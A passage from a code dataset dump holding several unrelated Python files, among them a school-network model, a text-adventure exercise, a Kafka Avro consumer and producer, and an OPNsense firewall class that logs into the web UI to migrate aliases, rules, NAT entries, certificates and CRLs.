, prop_c = np.array(HH_dist_frame.loc[edge[1]]))\n schools_net.add_edge(*edge, weight = c_ij , inv_weight=c_ij, pup_count=weights[i], inv_pup_count=weights[i])\n \n \n return schools_net\n\ndef edge_weight(weight=1., ave_age_diff=1., prop_c = np.array([0.2, 0.3, 0.35, 0.1, 0.05])):\n \n rho = lambda n: sum([k * (n-k) for k in np.arange(1, n)])/((n-1.)+0.0000000000000000001)\n nobs = lambda n: prop_c[n-1] * (n - 1) / n\n weight_new = weight * ave_age_diff * sum([rho(n) * nobs(n) for n in np.arange(1, int(len(prop_c) + 1))])\n \n \n return weight_new\n\n\ndef geo_dist(data, node1, node2):\n \n return np.array(data.query(\"BRIN == @node1\").geometry)[0].distance(np.array(data.query(\"BRIN == @node2\").geometry)[0])\n \n\n\ndef make_random_network(net, school_frame, school_data):\n \n ran_net = nx.Graph()\n \n secondary_urns = [s for s in school_frame.SecondaryURN.unique() if s in map(str, school_data.BRIN)]\n\n ran_net.add_nodes_from(secondary_urns, typ='Sec')\n \n primary_urns = [p for p in school_frame.Primary_School_URN.unique() if p in map(str, school_data.BRIN)]\n #primary_names = school_frame['INSTELLINGSNAAM PO'].unique()\n ran_net.add_nodes_from(primary_urns, typ='Pri')\n \n for sec in secondary_urns[:1]: \n \n link_weights = np.array([[pri , net.degree(pri, weight='weight')/geo_dist(school_data, sec, pri)] for pri in primary_urns])\n #link_weights = link_weights / sum(link_weights)\n \n lw_n = link_weights[:,0]\n lw_w = np.array(map(float, link_weights[:,1]))\n \n lw_w_edge = net.degree(sec, weight='weight') * lw_w / sum(lw_w)\n \n for i, p in enumerate(lw_n):\n ran_net.add_edge(p, sec, weight=lw_w_edge[i])\n \n \n \n \n return ran_net\n \n\ndef make_random_adjmat(net, school_frame, school_data, p=1., rule = 'power', sec_pri_only=True):\n \n school_data_match = school_data.query('BRIN in @net.nodes()')\n \n \n \n print( len(school_data_match))\n \n \n nodelist = np.array(school_data_match.BRIN)\n \n xs = np.array(school_data_match.x_coord)\n ys = np.array(school_data_match.y_coord)\n \n xmat = np.array([list(xs)]*len(xs)).T\n ymat = np.array([list(ys)]*len(ys)).T\n \n dist_mat = ((xmat - xs)**2 + (ymat - ys)**2)**0.5\n if rule == 'power': \n inv_dist_mat = 1./dist_mat**p\n inv_dist_mat[np.where(inv_dist_mat == inv_dist_mat[0,0])] = 0.\n \n elif rule == 'gauss': \n inv_dist_mat = np.exp(-1. * (dist_mat/1000.) 
** p)\n inv_dist_mat = inv_dist_mat * -(np.identity(len(nodelist)) - 1.)\n #return dist_mat, inv_dist_mat\n \n else:\n print( 'enter valid rule: \"power\" or \"gauss\"')\n return 0, 0, 0\n \n \n \n degs = [net.degree(k, weight='weight') for k in school_data_match.BRIN]\n degmat = np.array([degs]*len(degs))\n deg_scaled_mat = inv_dist_mat * degmat\n \n if sec_pri_only == True:\n \n kinds = np.array(school_data_match.kind)\n kinds_mat = np.array([list(kinds)]*len(kinds)).T\n sec_pri_link = kinds_mat != kinds\n \n deg_scaled_mat_sp = sec_pri_link * deg_scaled_mat \n \n \n \n contact_mat = degmat * deg_scaled_mat_sp/sum(deg_scaled_mat_sp)\n \n else: \n contact_mat = deg_scaled_mat\n \n \n \n \n return contact_mat, nodelist, dist_mat\n\n\ndef compare_nets(adjmat, net, school_frame, school_data, rule='gauss', ps=np.arange(0.5, 0.85, 0.05)):\n aj_mats = []\n for p in ps:\n contact_mat = make_random_adjmat(net, school_frame, school_data, p, 'gauss')\n dist_dist_c = sum(contact_mat[0] * contact_mat[2]) / (sum(contact_mat[0])+1.e-15)\n h, b = np.histogram(dist_dist_c, bins=range(0,20000, 500))\n plt.plot(b[:-1],h, alpha=0.9)\n aj_mats.append(contact_mat)\n \n dist_dist_d = sum(adjmat * contact_mat[2]) / (sum(adjmat)+1.e-15)\n \n hd, bd = np.histogram(dist_dist_d, bins=range(0,20000, 500))\n \n plt.plot(bd[:-1],hd,'kx-', alpha=0.8)\n \n plt.legend(labels=list(ps) + ['data'])\n \n return aj_mats\n \n \n \n","repo_name":"jdmunday/SchoolsMealesNL","sub_path":"functions/make_network.py","file_name":"make_network.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"39346703761","text":"file = input(\"Enter the input file name: \")\n\ncounter = {}\n\nwith open(file) as f:\n word_list = f.read().split()\n \n for word in sorted(word_list):\n counter.update({word:0})\n\n for x in counter.keys():\n for word in word_list:\n if word == x:\n counter[word] += 1\n\n\nprint(counter)","repo_name":"azakimi123/Python","sub_path":"dictionary_counter.py","file_name":"dictionary_counter.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"14071678895","text":"from sys import exit\n\ndef gold_room():\n print(\"This room is full of gold. 
How much do you take?\")\n #Wir fragen ab, wie viel Gold wir nehmen wollen und speichern das\n #in \"choice\" (ist ein String)\n choice = input(\"> \")\n how_much=int(choice)\n #Wenn eine Null oder eine Eins in der Eingabe mit dabei ist...\n if how_much == 1 or how_much == 0:\n #...wandeln wir die String Eingabe in den Int Datentyp um\n #und speichern den Wert als how_much\n dead(\"Man, learn to type a number\")\n\n if how_much < 50:\n print(\"Nice, you're not greedy, you win!\")\n exit(0)\n\n else:\n dead(\"You greedy bastard!\")\n\n\ndef bear_room():\n print(\"There is a bear here\")\n print(\"The bear has a bunch of honey\")\n print(\"The fat bear is in front of another door.\")\n print(\"How are you going to move the bear?\")\n print(\"Your options are: , , \")\n bear_moved= False\n\n while True:\n choice = input(\"> \")\n\n if choice == \"take honey\":\n dead(\"The bear looks at you then slaps your face off\")\n\n #Eine weitere If Abfrage\n elif choice == \"taunt bear\" and not bear_moved:\n print(\"The bear has moved from the door\")\n print(\"You can go through it now\")\n bear_moved= True\n\n elif choice == \"taunt bear\" and bear_moved:\n dead(\"The bear gets pissed off and chews your leg off.\")\n\n elif choice == \"open door\" and bear_moved:\n gold_room()\n\n else:\n print(\"I got no idea what that means. Try again.\")\n\n\ndef cthulhu_room():\n print(\"Here you see great evil Cthulu.\")\n print(\"He, it, whatever stares at you and you go insane\")\n print(\"Do you flee for your life or eat your head?\")\n\n choice = input(\"> \")\n\n if \"flee\" in choice:\n start()\n elif \"head\" in choice:\n dead(\"Well that was tasty!\")\n else: cthulhu_room()\n\n#Diese Funktion rufen wir ja oben immer auf (z.B. dead(\"You are dead\")\n#also wird die Funktion mit dem String \"You are dead\" aufgerufen ud\n#you are dead als why mit in die Funktion gegeben )\ndef dead(why):\n print(why, \"Good job!\")\n exit(0)\n\ndef start():\n print(\"You are in a dark room \")\n print(\"There is a door to your right and left\")\n print(\"Which one do you take?\")\n\n choice = input (\"> \")\n\n if choice == \"left\":\n bear_room()\n elif choice == \"right\":\n cthulhu_room()\n else:\n dead(\"You stumble around the room until you starve\")\n\n\nstart()\n","repo_name":"ad002/LPTHW","sub_path":"ex35.py","file_name":"ex35.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"2988464709","text":"from io import BytesIO\nfrom fastavro import reader, parse_schema, schemaless_writer, schemaless_reader\nfrom confluent_kafka import Consumer, SerializingProducer\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroSerializer\n\nfrom huub_schemas import DeliveryEventV6AvroSchema\n\nconsumer_conf = {\n 'bootstrap.servers': '52.213.38.208:9092', \n 'group.id': 'landau_test_consumer6', \n 'auto.offset.reset': 'earliest'\n}\nsms_fields = [\n {'name': 'timestamp', 'type': 'long'},\n {'name': 'process_reference', 'type': ['null', 'string']},\n {'name': 'variant_id', 'type': 'int'},\n {'name': 'warehouse_id', 'type': 'int'},\n {'name': 'warehouse_name', 'type': 'string'},\n {'name': 'huubclient_id', 'type': 'int'},\n {'name': 'ean', 'type': 'string'},\n {'name': 'reference', 'type': 'string'},\n {'name': 'sales_channel_type', 'type': 'string'},\n {'name': 'delta', 'type': 'int'},\n {'name': 'stock_after_adjust', 'type': 'int'},\n]\n\nschema = {\n 'name': 
'delivery_event',\n 'type': 'record',\n 'fields': DeliveryEventV6AvroSchema\n}\nparsed_schema = parse_schema(schema)\nconsumer = Consumer(consumer_conf)\nconsumer.subscribe(['delivery_events_v6_topic'])\n\n# producer \n\nschema_registry_conf = {\n 'url': 'http://schema-registry:8081'\n}\n\nschema_registry_client = SchemaRegistryClient(schema_registry_conf)\ndelivery_schema = schema_registry_client.get_schema(52)\n# delivery_schema = schema_registry_client.get_latest_version('delivery_event-value')\nprint(delivery_schema.schema_str)\ndelivery_serializer = AvroSerializer(schema_registry_client, delivery_schema.schema_str)\n\nproducer_conf = {\n 'bootstrap.servers': 'broker:29092', \n 'client.id': 'delivery_producer', \n 'value.serializer': delivery_serializer, \n 'plugin.library.paths': 'monitoring-interceptor'\n}\nproducer = SerializingProducer(producer_conf)\n\nwhile True:\n msg = consumer.poll()\n with BytesIO(msg.value()) as buff:\n value = schemaless_reader(buff, parsed_schema)\n print(value)\n break\n producer.produce('delivery_events_v6_topic', value=value)\n producer.flush()\n","repo_name":"landaudiogo/kafka-consumer-group-autoscaler","sub_path":"src/consumer_huub.py","file_name":"consumer_huub.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4441540837","text":"from tkinter import *\nfrom tkinter import ttk\n\nfrom component import Component\n\nclass TextRecognition(Component):\n def __init__(self, parent):\n super().__init__(parent, 'TextRecognition')\n # Labelled Frame\n self.labelframe = ttk.Labelframe(self.frame)\n self.labelframe.configure(text='Text Recognition', padding=10)\n # Buttons\n self.buttonNew = ttk.Button(self.labelframe)\n self.buttonNew.configure(\n text='Fuck'\n )\n self.buttonOpen = ttk.Button(self.labelframe)\n self.buttonOpen.configure(\n text='Shit'\n )\n self.buttonSave = ttk.Button(self.labelframe)\n self.buttonSave.configure(\n text='Bitch'\n )\n # Grid Configuration\n self.labelframe.grid(row=0, column=0, sticky=NSEW)\n self.buttonNew.grid(row=0, column=0, sticky=W)\n self.buttonOpen.grid(row=0, column=1)\n self.buttonSave.grid(row=0, column=2, sticky=E)","repo_name":"zyc-goose/4th-year-project-talking-handout","sub_path":"source-code/tk_widgets/textrec.py","file_name":"textrec.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"16366784270","text":"from fastapi import APIRouter\nfrom fastapi import Query\nfrom typing import Optional\nfrom src.models.report import Report\n\n\n\nrouter = APIRouter(\n prefix=\"/report\",\n tags=[\"report\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\n@router.get(\"/report_sub_total_sale/{customer_code}\")\nasync def report_sub_total_sale(customer_code):\n db_control=Report()\n start_length=90\n segment=20\n results=db_control.report_sub_total_sale(customer_code,start_length,segment)\n return results\n\n@router.get(\"/report_subtotal_item/{item_code}\")\nasync def report_subtotal_item(item_code):\n db_control=Report()\n start_length=90\n segment=10\n results=db_control.report_subtotal_item(item_code,start_length,segment)\n return results\n\n#get_sale_pie_by_customer_code(self,customer_code,start_length)\n@router.get(\"/get_sale_pie_by_customer_code/{customer_code}\")\nasync def get_sale_pie_by_customer_code(customer_code):\n db_control=Report()\n start_length=90\n 
results=db_control.get_sale_pie_by_customer_code(customer_code,start_length)\n return results\n","repo_name":"cjiamram/FishAPI","sub_path":"src/endpoints/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74213624135","text":"#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\nCopyright 2023 CITRAIT\r\n// Permission is hereby granted, free of charge, to any person obtaining a \r\n// copy of this software and associated documentation files (the \"Software\"), \r\n// to deal in the Software without restriction, including without limitation \r\n// the rights to use, copy, modify, merge, publish, distribute, sublicense, \r\n// and/or sell copies of the Software, and to permit persons to whom the \r\n// Software is furnished to do so, subject to the following conditions:\r\n//\r\n// The above copyright notice and this permission notice shall be included in \r\n// all copies or substantial portions of the Software.\r\n//\r\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS \r\n// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE \r\n// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \r\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING \r\n// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER \r\n// DEALINGS IN THE SOFTWARE.\r\n\"\"\"\r\nimport sys\r\nimport json\r\nimport urllib3\r\nimport requests\r\nimport xml.etree.ElementTree as ET\r\nimport re\r\nfrom base64 import b64decode\r\n\r\n\r\n\r\n\r\n# Class: Firewall\r\n# @Desc.: Represents a firewall api connection (opnsense)\r\n#\r\nclass Firewall:\r\n def __init__(self, user, password, baseurl):\r\n self.user = user\r\n self.password = password\r\n self.baseurl = baseurl\r\n self.csrftoken = ''\r\n self.hidden_name = ''\r\n self.hidden_value = ''\r\n self.http_session = requests.Session()\r\n # login on startup\r\n self.check_connection()\r\n \r\n\r\n def check_connection(self):\r\n print(f'connecting to firewall on {self.baseurl}')\r\n \r\n # requesting firewall landing page\r\n r = self.http_session.get(self.baseurl, verify=False)\r\n \r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token from landing page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n \r\n # submitting login form\r\n data = {self.hidden_name: self.hidden_value, 'usernamefld': self.user, 'passwordfld': self.password, 'login':'1'}\r\n r = self.http_session.post(self.baseurl, data=data, verify=False, allow_redirects=False )\r\n\r\n # checking if login was successful\r\n if r.status_code == 302 and 'Location' in r.headers:\r\n print(f'[+] firewall login sucessful')\r\n else:\r\n print(f'[-] invalid username or password for this firewall')\r\n\r\n\r\n \r\n #\r\n #\r\n # \r\n def add_alias(self, alias):\r\n # acessing aliaseses page to grab token\r\n r = self.http_session.get(f'{self.baseurl}/ui/firewall/alias', verify=False )\r\n \r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as 
{match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n alias_data = {\r\n \"alias\": {\r\n \"enabled\": \"1\",\r\n \"name\": alias[\"alias\"][\"name\"],\r\n \"type\": alias[\"alias\"][\"type\"],\r\n \"proto\": \"\",\r\n \"categories\": \"\",\r\n \"updatefreq\": \"\",\r\n \"content\": alias[\"alias\"][\"content\"],\r\n \"interface\": \"\",\r\n \"counters\": \"0\",\r\n \"description\": alias[\"alias\"][\"description\"]\r\n },\r\n \"network_content\":\"\"\r\n }\r\n \r\n # setup headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/ui/firewall/alias'\r\n \r\n # sending form of new alias:\r\n r = self.http_session.post(f'{self.baseurl}/api/firewall/alias/addItem/', verify=False, json=alias_data, headers=headers)\r\n if r.status_code == 200:\r\n print(f'[+] alias criado com sucesso!')\r\n return True\r\n else:\r\n print(f'[-] erro ao cadastrar novo alias.')\r\n return False\r\n\r\n\r\n\r\n\r\n def list_alias(self):\r\n url_alias_list = self.baseurl + 'firewall/alias/get'\r\n r = requests.get(url_alias_list, \r\n verify=False, \r\n auth=(self.api_key, self.api_secret))\r\n if r.status_code == 200:\r\n print(r.text)\r\n return True\r\n else:\r\n print(f'error adding alias: {r.text}')\r\n return False\r\n\r\n\r\n def del_alias(self, alias):\r\n pass\r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def add_filter_rule(self, rule):\r\n # acessing form of rules to grab token\r\n r = self.http_session.get(f'{self.baseurl}/firewall_rules_edit.php?if=lan', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n # filling form data for new rule\r\n data = {\r\n self.hidden_name: self.hidden_value, \r\n 'type': rule[\"rule\"]['action'],\r\n 'quick':'yes',\r\n 'interface': rule[\"rule\"]['interface'],\r\n 'direction':'in',\r\n 'ipprotocol': rule[\"rule\"]['ipprotocol'],\r\n 'protocol': 'any',\r\n 'src': rule[\"rule\"][\"source_net\"],\r\n 'srcmask':'32',\r\n 'srcbeginport': 'any',\r\n 'srcendport': 'any',\r\n 'dst': rule[\"rule\"][\"destination_net\"],\r\n 'dstmask':'32',\r\n 'dstbeginport': 'any',\r\n 'dstendport': 'any',\r\n 'descr': rule[\"rule\"][\"description\"],\r\n 'sched':'',\r\n 'gateway': '',\r\n 'reply-to':'',\r\n 'set-prio':'',\r\n 'set-prio-low':'',\r\n 'prio':'',\r\n 'tos':'',\r\n 'tag':'',\r\n 'tagged':'',\r\n 'max':'',\r\n 'max-src-nodes':'',\r\n 'max-src-conn':'',\r\n 'max-src-states':'',\r\n 'max-src-conn-rate':'',\r\n 'max-src-conn-rates':'',\r\n 'overload':'virusprot',\r\n 'statetimeout':'',\r\n 'adaptivestart':'',\r\n 'adaptiveend':'',\r\n 'os':'',\r\n 'statetype':'keep state',\r\n 'Submit':'Save'\r\n }\r\n \r\n # fix para alguns campos que podem ter sido omitidos nas regras\r\n if 'floating' in rule[\"rule\"]:\r\n data[\"floating\"] = \"1\"\r\n # for iface in rule[\"rule\"][\"interface\"].split(\",\")\r\n # data[\"interface[]\"]\r\n if 'gateway' in rule[\"rule\"]:\r\n data[\"gateway\"] = 
rule[\"rule\"][\"gateway\"]\r\n if 'protocol' in rule[\"rule\"]:\r\n data[\"protocol\"] = rule[\"rule\"][\"protocol\"]\r\n if 'srcnot' in rule[\"rule\"]:\r\n data[\"srcnot\"] = rule[\"rule\"][\"srcnot\"]\r\n if 'srcmask' in rule[\"rule\"]:\r\n data[\"srcmask\"] = rule[\"rule\"][\"srcmask\"]\r\n if 'dstmask' in rule[\"rule\"]:\r\n data[\"dstmask\"] = rule[\"rule\"][\"dstmask\"]\r\n if 'dstbeginport' in rule[\"rule\"]:\r\n # fix para porta destino como range (one field on pfsense, two separate fields in opnsense).\r\n if rule[\"rule\"][\"dstbeginport\"] is not None and '-' in rule[\"rule\"][\"dstbeginport\"]:\r\n data[\"dstbeginport\"] = rule[\"rule\"][\"dstbeginport\"].split(\"-\")[0]\r\n data[\"dstendport\"] = rule[\"rule\"][\"dstbeginport\"].split(\"-\")[1]\r\n else:\r\n data[\"dstbeginport\"] = rule[\"rule\"][\"dstbeginport\"]\r\n data[\"dstendport\"] = rule[\"rule\"][\"dstbeginport\"]\r\n \r\n\r\n \r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/firewall_rules.php?if=lan'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n #print(f'DEBUG: {data}')\r\n \r\n # sending form of new rule:\r\n r = self.http_session.post(f'{self.baseurl}/firewall_rules_edit.php?if={data[\"interface\"]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n if r.status_code == 302:\r\n print(f'regra de firewall criada com sucesso!')\r\n # aplicando as alterações\r\n r = self.http_session.post(f'{self.baseurl}/firewall_rules.php?if=lan', verify=False, data={self.hidden_name: self.hidden_value, 'act':'apply'})\r\n if r.status_code == 200:\r\n pass\r\n #print(f'configuração aplicada com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao cadastrar nova regra.')\r\n return False\r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def add_nat_rule(self, nat_rule):\r\n # acessing form of nat rules to grab token\r\n r = self.http_session.get(f'{self.baseurl}/firewall_nat_edit.php', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n # filling form data for new rule\r\n data = nat_rule\r\n data[self.hidden_name] = self.hidden_value\r\n \r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/firewall_nat_edit.php'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n #print(f'DEBUG: {data}')\r\n \r\n # sending form of new rule:\r\n r = self.http_session.post(f'{self.baseurl}/firewall_nat_edit.php', verify=False, allow_redirects=False, data=data, headers=headers)\r\n if r.status_code == 302:\r\n print(f'regra de nat criada com sucesso!')\r\n # aplicando as alterações\r\n r = self.http_session.post(f'{self.baseurl}/firewall_nat.php', verify=False, data={self.hidden_name: self.hidden_value, 'apply':'Apply changes'})\r\n if r.status_code == 200:\r\n pass\r\n #print(f'configuração aplicada 
com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao cadastrar nova regra.')\r\n return False\r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def import_ca(self, ca):\r\n # acessing form of new ca (system-> trust->ca)\r\n r = self.http_session.get(f'{self.baseurl}/system_camanager.php?act=new', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'id': '',\r\n 'act': 'new',\r\n 'descr': ca[\"descr\"],\r\n 'camethod': 'existing',\r\n 'cert': b64decode(ca[\"crt\"]).decode().replace(\"\\n\",\"\\r\\n\"),\r\n 'key': b64decode(ca[\"prv\"]).decode(),\r\n 'serial': '',\r\n 'caref': ca[\"refid\"],\r\n 'save': 'Save',\r\n\r\n }\r\n \r\n # fix for serial\r\n if int(ca[\"serial\"] ) > 0:\r\n data[\"serial\"] = ca[\"serial\"]\r\n \r\n #print(f'DEBUG CA: {data}')\r\n \r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/system_camanager.php?act=new'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n #print(f'DEBUG: {form_data}')\r\n \r\n # sending form of ca import:\r\n r = self.http_session.post(f'{self.baseurl}/system_camanager.php?act=new', verify=False, allow_redirects=False, data=data, headers=headers)\r\n #print(f'DEBUG: {r.request.body}')\r\n #print(f'DEBUG: {r.request.headers}')\r\n \r\n if r.status_code == 302:\r\n print(f'CA {ca[\"descr\"]} importada com sucesso!')\r\n return True\r\n \r\n else:\r\n #print(f'erro ao importar CA. 
detalhes: {r.text}')\r\n print(f'erro ao importar CA.')\r\n return False\r\n \r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def import_certificate(self, cert):\r\n # acessing form of new ca (system-> trust->ca)\r\n r = self.http_session.get(f'{self.baseurl}/system_certmanager.php?act=new', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'act': 'new',\r\n 'descr': cert[\"descr\"],\r\n 'certmethod': 'import',\r\n 'cert': b64decode(cert[\"crt\"]).decode(),\r\n 'key': b64decode(cert[\"prv\"]).decode(),\r\n 'certref': cert[\"refid\"],\r\n 'save': 'Save',\r\n\r\n }\r\n\r\n \r\n #print(f'DEBUG CERT: {data}')\r\n \r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/system_certmanager.php?act=new'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n # sending form of ca import:\r\n r = self.http_session.post(f'{self.baseurl}/system_certmanager.php?act=new', verify=False, allow_redirects=False, data=data, headers=headers)\r\n #print(f'DEBUG: {r.request.body}')\r\n #print(f'DEBUG: {r.request.headers}')\r\n \r\n if r.status_code == 302:\r\n print(f'CERTIFICATE {cert[\"descr\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n #print(f'erro ao importar CA. detalhes: {r.text}')\r\n print(f'erro ao importar certificado.')\r\n return False\r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def import_crl(self, crl, root_config):\r\n # acessing main page of ca to get id (certref) of target ca\r\n r = self.http_session.get(f'{self.baseurl}/system_camanager.php', verify=False )\r\n \r\n # hold existing ca info\r\n existing_ca_info = {}\r\n \r\n # extract available ca's ids\r\n matches = re.findall('system_camanager.php\\?act=exp&id=(?P\\d+)', r.text)\r\n for ca_id in matches:\r\n print(f'looking for registered ca with id {ca_id}')\r\n # navigate into each ca edit page to get caref\r\n r = self.http_session.get(f'{self.baseurl}/system_camanager.php?act=edit&id={ca_id}', verify=False )\r\n #search for name and id\r\n ca_name_id_match = re.search('', r.text)\r\n print(f'found ca: {ca_name_id_match.group(\"refid\")} : {ca_name_id_match.group(\"caname\")}')\r\n # push info into existing ca list\r\n existing_ca_info[ca_name_id_match.group(\"caname\")] = ca_name_id_match.group(\"refid\")\r\n \r\n # get cert name from pfsense config\r\n target_ca = None\r\n ca_el = root_config.findall(\"ca\")\r\n for ca in ca_el:\r\n ca_attr = {}\r\n for attr in ca:\r\n ca_attr[attr.tag] = attr.text\r\n #print(f'DEBUG CA: {ca_attr}')\r\n if ca_attr['refid'] == crl['caref']:\r\n target_ca = ca_attr\r\n \r\n if target_ca is None:\r\n print(f'Error registering crl. 
could not find CA with refid {crl[\"caref\"]}')\r\n sys.exit(0)\r\n \r\n target_ca_name = target_ca[\"descr\"]\r\n print(f'DEBUG: crl {crl[\"descr\"]} will be registered for ca {target_ca_name} with refid {existing_ca_info[target_ca_name]}')\r\n\r\n # acessing page to register a new crl using ca ref\r\n #print(f'acessing page: {self.baseurl}/system_crlmanager.php?act=new&caref={existing_ca_info[target_ca[\"descr\"]]}')\r\n r = self.http_session.get(f'{self.baseurl}/system_crlmanager.php?act=new&caref={existing_ca_info[target_ca[\"descr\"]]}', verify=False )\r\n \r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'act': 'new',\r\n 'descr': crl[\"descr\"],\r\n 'caref': existing_ca_info[target_ca_name],\r\n 'crlmethod': 'internal',\r\n 'crltext': '',\r\n 